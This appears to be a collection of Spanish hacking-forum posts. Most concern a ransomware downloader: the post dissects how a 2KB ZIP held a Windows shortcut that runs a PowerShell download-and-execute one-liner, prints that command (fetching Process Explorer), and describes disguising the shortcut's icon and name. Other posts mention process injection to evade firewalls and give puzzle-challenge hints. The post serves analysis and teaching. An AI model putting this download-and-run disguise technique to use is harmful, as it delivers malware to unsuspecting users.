Mensajes

A grendes rasgos, para ocultar un malware y hacerlo "invisible" al firewall se usa la inyección de procesos, básicamente coges un proceso del equipo que sí tiene acceso a internet (tiene permiso por el firewall) e inyectas el payload del malware en dicho proceso.

Pero como te han dicho ya, estás empezando la casa por el tejado, antes te toca estudiar temas más básicos para finalmente empezar con la inyección de código.

Esta interesante el tema me gusto

Lo puedo compartir en mi blog

Saludos

Claro!

[el fichero ZIP ocupaba 1,26Kb (descomprimido eran 2Kb...)]

Hola

Hace tiempo que no me paso por mi sección del foro favorita para compartir nuevas ideas... Recientemente ha llegado a mis manos un virus de tipo ramsonware oculto en un fichero zip (por e-mail), curiosamente mi antivirus no detectó la amenaza, así que me puse a destriparlo en mi VM.

El funcionamiento es muy básico, tras ejecutar el fichero que hay en el ZIP, se ejecuta un ejecutable EXE y se inicia la infección de los ficheros. Hasta aquí todo normal, excepto que el fichero ZIP ocupaba 1,26Kb (descomprimido eran 2Kb...) ¿Cómo podía un fichero de 2Kb cifrar de forma eficiente todos los fichero del disco? La respuesta era fácil, ese fichero de 2Kb no era el ramsonware, sino un pequeño fichero (downloader) que se descargaba una copia del EXE (ramsonware) desde internet y luego lo ejecutaba. Todo ello en un ficherito de 2Kb.

Tras mi análisis pude ver el truco, un simple acceso directo al proceso powershell.exe de Windows y una pequeña línea de código añadida como parámetro del propio acceso directo. Sublime!

El código para descargar y ejecutar un fichero desde internet en PowerShell sería el siguiente:

Código (vb) [Seleccionar] Expandir

$c=$env:userprofile+'\tmp.exe';
(New-Object System.Net.WebClient).Downloadfile('https://live.sysinternals.com/procexp.exe',$c);
Start-Process $c

La primera línea define una variable $c con el valor de "C:\Users\usuario_actual\tmp.exe"
La segunda línea crea un nuevo objeto del tipo WebClient y llama a su función DownloadFile, indicando la ruta y el destino ($c)
La tercera línea ejecuta el fichero descargado $c usando Start-Process.

Todo ese código se puede escribir en una sola línea y enviarlo como argumento directamente al proceso powershell.exe usando un acceso directo:





Editando el icono y el nombre podremos disimular el downloader todavía más. Quedando un único fichero de apenas 2Kb completamente funcional.

Os dejo un ejemplo para que entendáis el proceso, es completamente inofensivo. Este acceso directo os descargará y ejecutará el programa ProcessExplorer.exe desde internet

http://www.mediafire.com/download/kj3mtepo8h6zypu/musica.zip

Saludos!!

Madre de dios bendito... te has parado a leer tus mensajes antes de publicarlos? Creo que no se puede ser más pedante...

La gente que alardea de saber programar en 3, 5, 12 o 90 lenguajes de programación quedan retratados en lo MUCHO que les falta para convertirse en programadores reales. Un buen programador sabe programar en cualquier lenguaje, pues lo único que cambia es la sintaxis (teniendo en cuenta que prácticamente todos los lenguajes comparten similitudes en cuando a sintaxis).

He tenido la suerte de conocer a grandes programadores, gente con la que he trabajado, se presenta un proyecto heredado de un nuevo cliente y son capaces de continuar el código en menos de 6 horas (código escrito por otra empresa en un lenguaje que jamás han utilizado). Cuando sabes programar te da igual el lenguaje, venir a un foro y decir que sabes programar en "C y sus derivados (C#,C++. Ect), Php, Python, Java, HTML, Xml, Asp, Ensambler,  javascript, Lisp, Lua, Clojure, R, Haskell, VB.net, VB, Foxpro, Ruby On Rails ect..." te deja en muy mal lugar. Además has escrito "C y sus derivados (C#,C++. Ect)" cuando esos lenguajes no son derivados de nada.. se llaman C C++ y C# porque comparten sintaxis, pero los 3 lenguajes son suficientemente diferentes como para que CUALQUIER programador que se precie no los catalogue como "derivados", además no sabes ni escribir correctamente Ensamblador. Has puesto HTML como lenguaje de programación... en fin. Éste punto ha quedado bastante claro creo yo.

Dices tener conocimientos expertos en TCP/IP? Me puedes explicar exactamente que conocimientos expertos necesitas para entender un protocolo de comunicaciones? Te leíste 2 veces los RFC de TCP y ya se te otorga el rango de "conocedor experto" sobre dicho protocolo? De verdad, no termino de entenderte.

Luego mencionas cosas como Batch, bindear... wtf?

En fin, no te calientes, voy a bloquear éste hilo. Pecas de pedantería mientras dejas leer entre líneas lo desinformado que estás sobre la materia.

Que te vaya todo muy bien en la vida, te deseo mucha suerte (la vas a necesitar). Adiós

A mi me está gustando y me esta pareciendo bastante entretenido. Y si me dijeras una piesta para poder continuar me lo parecería aun más 

Como lo llevas? Sigues atascado?

Cuando se me vino la idea a la cabeza me pareció una estupidez el hecho de que se conservase la imagen subida tal y como la subiste tu para ponerla de perfil, pero menuda sorpresa me lleve, y que alegría. Los códigos posteriores he de decir que fue fácil adivinar como usarlos. Ahora tengo una imagen parecida a las dos anteriores que ya han salido, así que la guardaré con esas. Por otra lado, a ver que se puede hacer con la imagen del bosque, empezaré por pensar que el nombre "tree" es una pista.
Se me olvidaba, de esas fotos extrañas tengo tres, la que acabo de encontrar lleva el nombre de ira, y otra que apareció anteriormente tenía como nombre gula, como tengo 3 fotos, supongo que aun me quedaran otras 4 por encontrar, por los 7 pecados capitales.

Un saludo.

Me alegra que hayas podido descifrar el enigma de Link Es curioso como he logrado esconder ese mensaje, eh? jeje.
Ahora estás con el árbol. Veamos que tal te las apañas para solventar esa prueba. Tu deducción de los pecados capitales es correcta.

Por cierto, os está gustando el reto? Es muy largo?

[EDIT IMPORTANTE QUE NO TIENE QUE VER CON EL ACERTIJO DE LINK:]

Estáis muy cerca... La clave es en entender el mensaje del enigma.

en su interior hallarás la respuesta...



EDIT IMPORTANTE QUE NO TIENE QUE VER CON EL ACERTIJO DE LINK: Más adelante os encontraréis la imagen de un apóstol. Esa imagen representa que es el apóstol Job, lo que pasa es que cometí un error seleccionando la foto. Vosotros no os centréis en la imagen "real" del apóstol, en su lugar imaginaos que esa imagen es de Job

Suerte!

[PyCharm]

PyCharm es de lejos el mejor IDE que puedas utilizar para Python. Ágil, similar a VS y con un excelente debugger.

"LA RESPUESTA ES MLHNUREUPYN"  no ecuentro este palabro por ningún lado

Mira el codigo de la web...

El código que esta escondido en esa imagen es el nombre del archivo que le tienes que pasar al robot rblMIG7 y al ponérselo te responde con ese acertijo. He pensado que la clave podría estar en que su foto de perfil es Link, pero no veo por donde tirar.

Un saludo.

uy uy uy, estás muy cerca

Veo que han seguido con el reto! Bravo.
Dicho sea de paso creo Mad Antrax que el último id de paste está muerto! o...   _is_a_lie  jeje

Que id? dime el id y lo compruebo.